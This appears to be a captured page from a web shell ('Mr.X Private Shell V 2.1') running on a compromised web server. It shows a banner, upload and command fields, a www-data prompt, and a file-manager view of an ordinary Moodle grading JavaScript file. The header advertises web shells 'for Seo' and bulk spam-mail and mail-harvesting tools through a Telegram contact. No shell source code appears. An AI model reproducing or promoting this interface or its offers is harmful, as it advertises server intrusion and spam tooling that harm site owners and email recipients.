__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
/**
 * YUI module for advanced grading methods - the manage page
 *
 * @author David Mudrak <david@moodle.com>
 * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
YUI.add('moodle-core_grading-manage', function(Y) {

    var MANAGE = function() {
        MANAGE.superclass.constructor.apply(this, arguments);
    }

    Y.extend(MANAGE, Y.Base, {

        initializer : function(config) {
            this.setup_messagebox();
        },

        setup_messagebox : function() {
            Y.one('#actionresultmessagebox span').setContent(M.util.get_string('clicktoclose', 'core_grading'));
            Y.one('#actionresultmessagebox').on('click', function(e) {
                e.halt();
                var box = e.currentTarget;
                var anim = new Y.Anim({
                    node: box,
                    duration: 1,
                    to: { opacity: 0, height: 0 },
                });
                anim.run();
                anim.on('end', function() {
                    var box = this.get('node'); // this === anim
                    box.remove(true);
                });
            });
        }

    }, {
        NAME : 'grading_manage_page',
        ATTRS : { }
    });

    M.core_grading = M.core_grading || {};

    M.core_grading.init_manage = function(config) {
        return new MANAGE(config);
    }

}, '@VERSION@', { requires:['base', 'anim'] });

Filemanager

Name Type Size Permission Actions
manage.js File 1.38 KB 0777
Filemanager